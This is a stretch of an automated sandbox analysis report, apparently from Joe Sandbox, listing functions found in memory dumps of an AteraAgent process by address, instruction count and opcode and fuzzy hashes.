                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 11e08de9403cc30fd9b1973d1316249ce3da0b505d0514714c3825a245f15532
                                                                                                                                                                                                                                          • Instruction ID: 6b8875817e25a450ca84f6a054a8ceddb58593124800826e96c16cc639d8339f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e08de9403cc30fd9b1973d1316249ce3da0b505d0514714c3825a245f15532
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41AC71E0961D8FEB68DF98D8656EDBBB1FF68304F01007AE409E72A1DB396801CB40
                                                                                                                                                                                                                                          Function 00007FFD9B417130 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4a54be46497cc240433faf4cf89bd4072571b6895c3d9d92f10ff51a45603d3d
                                                                                                                                                                                                                                          • Instruction ID: 3639dcac2df700535d1b2bf7d200fdf674d9cd24a7d817f9985f977c9ab0d4b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a54be46497cc240433faf4cf89bd4072571b6895c3d9d92f10ff51a45603d3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C431F631F1DE0D5FE768DA5CA8A957973E2EFA9315B01417EE049C72A7DE20AC0287C1
                                                                                                                                                                                                                                          Function 00007FFD9B4138E1 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e12c4f9090e9354340724368aad99ee41c4b9a9643d8f6bc5869801444eda58a
                                                                                                                                                                                                                                          • Instruction ID: 1953bda5993b361e00a9237fce9ec8c4c54859af37a62b54ab7052c3769b076d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e12c4f9090e9354340724368aad99ee41c4b9a9643d8f6bc5869801444eda58a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B418F71E18A1D9FEB40EF98D455AADB7F1FF69314F0541A6D018E72A2CB39A940CB80
                                                                                                                                                                                                                                          Function 00007FFD9B425138 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23694d133aa0d3a8a5abf35428cac6577f98a30ec5324d6d7c00d99c574e1d0e
                                                                                                                                                                                                                                          • Instruction ID: 0af6278f7cd72d60a5a53289bb90452e8811dfb815b380f7088592910cd5bbc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23694d133aa0d3a8a5abf35428cac6577f98a30ec5324d6d7c00d99c574e1d0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C41B030B19A498FDBA4EB6CC0A4E7573E1EF68304B1545B9D08AC72E6CE25FD45DB40
                                                                                                                                                                                                                                          Function 00007FFD9B42D801 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9303e44fa26e002a31677d6fe3872c076f0a12891fd75ebdd12f1f73a3defe32
                                                                                                                                                                                                                                          • Instruction ID: ca155970bd9ef3ebc1ddd4f33b9816993022aad02cecad83f692069d83745eaf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9303e44fa26e002a31677d6fe3872c076f0a12891fd75ebdd12f1f73a3defe32
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9741F63190E68D4FEB96DFA88865AE93FF0EF16304F0901BED049D71B3CA289945D790
                                                                                                                                                                                                                                          Function 00007FFD9B415771 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 75f6a6da0a80cefff5c6eb39d6327f7d43fd1ecb7eab36f1ca9c228adaee84c9
                                                                                                                                                                                                                                          • Instruction ID: 1fa76dd7f00ae00319adf0c990dc39bfe9b663c6dcf12943035e8a7bd8f69fc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75f6a6da0a80cefff5c6eb39d6327f7d43fd1ecb7eab36f1ca9c228adaee84c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C41A230E0AA0D8FDB94EFA8D4616ECB7B1FF59305F51247AD019E72A1CB79A841CB40
                                                                                                                                                                                                                                          Function 00007FFD9B417180 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 54d27347308b5e802657445deedd2bb284221a4ffb41dfcc8399b4349d2c7d11
                                                                                                                                                                                                                                          • Instruction ID: 8ef076a0c7b1978b4555ac881fc8b00234b35e92548b8aaa3a4ba6ea5132f6bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54d27347308b5e802657445deedd2bb284221a4ffb41dfcc8399b4349d2c7d11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5231C532B09D1C4FDBA8EA9C9869BF933D1FB98754F050176E40DD72A5DE14AC025381
                                                                                                                                                                                                                                          Function 00007FFD9B4184C1 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 522e560608d3ff31e30abb5409ee5c54c69275e38dcf8d8fb0e1b0bbfd132ce5
                                                                                                                                                                                                                                          • Instruction ID: f273da908aafaf073a42af846deeade50274f794a0ade2dced917d776ff1d134
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 522e560608d3ff31e30abb5409ee5c54c69275e38dcf8d8fb0e1b0bbfd132ce5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C041B171E09A0D8FEB54DBA8C4656EDBBB2FF69304F5400BAD009E7292DE396841CB41
                                                                                                                                                                                                                                          Function 00007FFD9B42CF1D Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b0c546f1c11bc8c18de7ad40bd311b2657fd109f354da9bfe4c30024abbe9e5e
                                                                                                                                                                                                                                          • Instruction ID: f0e22d50417555df6c3a6157440d0dacabbdc1ce4dbc48de8fb266b6120eff69
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0c546f1c11bc8c18de7ad40bd311b2657fd109f354da9bfe4c30024abbe9e5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F31A030B19A0D9BD728AB68C0A5AB973E1FF58308F59457DD05FC72A1CE35B9429780
                                                                                                                                                                                                                                          Function 00007FFD9B42A255 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a7c7c392ac746d21819f115bc425b598eec1c984d56af36f60d4ef4fd72ab9a4
                                                                                                                                                                                                                                          • Instruction ID: 68dfa5e948c8114bb73e65832a6b973fe2ece2e3554a5a94df2ab3b14813f5de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7c7c392ac746d21819f115bc425b598eec1c984d56af36f60d4ef4fd72ab9a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3531272170EB8D4FD769869D9C6563537D0EF56220F0A01BAE48DC71F2DD15EC02A352
                                                                                                                                                                                                                                          Function 00007FFD9B42FD02 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b00ffe1900542348c544b407a0bd24c6bf04df33809cb67f419eff854e01ef77
                                                                                                                                                                                                                                          • Instruction ID: dc7c9076c025c3277ebae7b2e13ecd5cf66901759c4f84275ef583dc82d06b45
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b00ffe1900542348c544b407a0bd24c6bf04df33809cb67f419eff854e01ef77
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C314B61A0EBCE0FE7569BAC84695A63FE1EF96250B0901FBD449CB2A7DE149C06C340
                                                                                                                                                                                                                                          Function 00007FFD9B42CFF0 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f297c147958c83fe5b28e599cba394dce291a5dd64b6d6f043c749d2fa5e4c75
                                                                                                                                                                                                                                          • Instruction ID: a7e95a8db69719a0e4a0dd9b87bbdb101b834e4ce60dcfef6e3261b3550f1ae9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f297c147958c83fe5b28e599cba394dce291a5dd64b6d6f043c749d2fa5e4c75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A219532B1D81D4FEBA4E79CA8A57F833D1EF98724F0501B6E40DC72A6DD14AD469381
                                                                                                                                                                                                                                          Function 00007FFD9B424030 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e5bb7a6ed32b17d3bd18c00045ff937a5b35c50b791e05174212b466866d69ae
                                                                                                                                                                                                                                          • Instruction ID: 1f2f2562af9497a89af8021a7b933d1301d434d38e2e1a278223bc52dff32fa0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5bb7a6ed32b17d3bd18c00045ff937a5b35c50b791e05174212b466866d69ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6210722B1ED4E0FFBE8E69C54B477923C6EF98355B4141BAD80DC32A5DD14ED02A380
                                                                                                                                                                                                                                          Function 00007FFD9B626FB1 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 265d48b1e5425ad2497b23525904664ea97c71775e265632dbc678598388523a
                                                                                                                                                                                                                                          • Instruction ID: c7b8b6a8fb15022834cb0a00d55df9e59bb514012fe0e93cadb97c98feb75873
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 265d48b1e5425ad2497b23525904664ea97c71775e265632dbc678598388523a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70310531B1DA0E4FFB68DF689065AB97392FF54314B5502B9D02ACB2D6DE25FD028780
                                                                                                                                                                                                                                          Function 00007FFD9B42CFC0 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc9b223a5280b383873f0002f835fadcf71e0701d9994139b388d0e73bcdaecd
                                                                                                                                                                                                                                          • Instruction ID: 2f95b615784cf73bd2471826b4f58ebad63420f2d8b65728970137599d934ee8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc9b223a5280b383873f0002f835fadcf71e0701d9994139b388d0e73bcdaecd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1531AF32B1981D4FEBA8EB9CA4647F833E1FF98314F0501B6E40DC72A6CE14AD419781
                                                                                                                                                                                                                                          Function 00007FFD9B4104F8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0713195eba00c184f9ae59b156c38013cdc5f0f10316e5bb96916f0a32e9dd4e
                                                                                                                                                                                                                                          • Instruction ID: bc08f73b2552ab2e0e521866e51a321eb47eaed6dc6b9ed46ffcbe670c9f1402
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0713195eba00c184f9ae59b156c38013cdc5f0f10316e5bb96916f0a32e9dd4e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A316B71E0861D8FDBA8DF98D8A57FE77B2FF54314F00017AD009E7295CA795A848B80
                                                                                                                                                                                                                                          Function 00007FFD9B41BB05 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d8e9f60b36793bc43d8a423b6e00ecd5c8213047d34d3f14abf355aee4bad9b
                                                                                                                                                                                                                                          • Instruction ID: f789b66af8b39071d905fb8213fad120e2acf46c5b98b5b045288e1952fff9f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9f60b36793bc43d8a423b6e00ecd5c8213047d34d3f14abf355aee4bad9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E314771F0964E8FF758EBA8D866BA977B1FF20310F0442B9D069D72E7EE6428018740
                                                                                                                                                                                                                                          Function 00007FFD9B426E69 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d94ee0cb05d6869dae957ce6f304c9f655cda5628366838542cff6af7d6571c2
                                                                                                                                                                                                                                          • Instruction ID: 2e85acc024b69b059b7a4a208358a7dbfe830c2e478d2f4474ba91971e5e9214
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94ee0cb05d6869dae957ce6f304c9f655cda5628366838542cff6af7d6571c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89315B7190CB8A4FE754EB688859565F7E1FFA5310F0502BED099C72E2DE38A9418742
                                                                                                                                                                                                                                          Function 00007FFD9B434340 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ac22b4cc3d94a5536bfe482b2078523864c8c8e87cf85db1fed4cf67cebf4737
                                                                                                                                                                                                                                          • Instruction ID: e40f52e2e07e6c258d3c3a79c095c3824587d2631d3bf31aece3119d1062f36b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac22b4cc3d94a5536bfe482b2078523864c8c8e87cf85db1fed4cf67cebf4737
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1312730B19A5E4FDBA5C678C564AE173D1FF64308F19457DC49EC32A5EA28B88287C0
                                                                                                                                                                                                                                          Function 00007FFD9B42D03A Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 78f38ec432e2ce285d3b6ba958863680c8ade93e35d64d7e6aece0603896cdb8
                                                                                                                                                                                                                                          • Instruction ID: 091e41b3c3a3a7a2fb892358030c849ce2ac2cb84a13f4e28d62567b3ecca2f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78f38ec432e2ce285d3b6ba958863680c8ade93e35d64d7e6aece0603896cdb8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D21A031B0A91C4FDBA4EB9C9898BE977E1FFA8714F0501B6E40DD72A5DE209D018781
                                                                                                                                                                                                                                          Function 00007FFD9B4298C8 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6950d188b36296c96d773a5b5332b918535769587f9b02ad78035bff0b9d55a3
                                                                                                                                                                                                                                          • Instruction ID: c0722cc3a1637d6921dbea3461519ddc093ed48fbaa70868db5b6c48a979c019
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6950d188b36296c96d773a5b5332b918535769587f9b02ad78035bff0b9d55a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB31DE3150EBC68FD7578B6898656907FF0EF47224B1A01EBC489CF1B3E2689C4AD751
                                                                                                                                                                                                                                          Function 00007FFD9B41E938 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8cd9ec58d24c23d5c825e9aab55b35067cfb6356a9613bc38352555f37e8e4f5
                                                                                                                                                                                                                                          • Instruction ID: 157e35d7ce7bbbe31a6341b709a985cce0a93dbfc0f6eee1a74d1bcc10c2a5a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cd9ec58d24c23d5c825e9aab55b35067cfb6356a9613bc38352555f37e8e4f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3214B5171F5CD4FE761E77C94596647BD1DF96244B0A40FAC448CF1B7DD28AC05A340
                                                                                                                                                                                                                                          Function 00007FFD9B41BE16 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ca9d5475f6d84222874c0c7c10a4ad235167bd257ebd6518960bfb1591d56af8
                                                                                                                                                                                                                                          • Instruction ID: 13211768f09e47bc80872f19d72021fca14c24bc1041eb87a430e799288fe582
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca9d5475f6d84222874c0c7c10a4ad235167bd257ebd6518960bfb1591d56af8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA213B22F0EF8E0FE7A5EB5844A52F4B3E1EBB9254B0502B7D44DC31A3DD1869474340
                                                                                                                                                                                                                                          Function 00007FFD9B426D59 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ee05be1741c5c547b824f35447db35e52cd5b81a9e8e46740fdbccab2748f4cd
                                                                                                                                                                                                                                          • Instruction ID: 1fdc3d0d6d2c7f19e39c12083026b7a2cb87550c09677de5eb6858924c72c09b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee05be1741c5c547b824f35447db35e52cd5b81a9e8e46740fdbccab2748f4cd
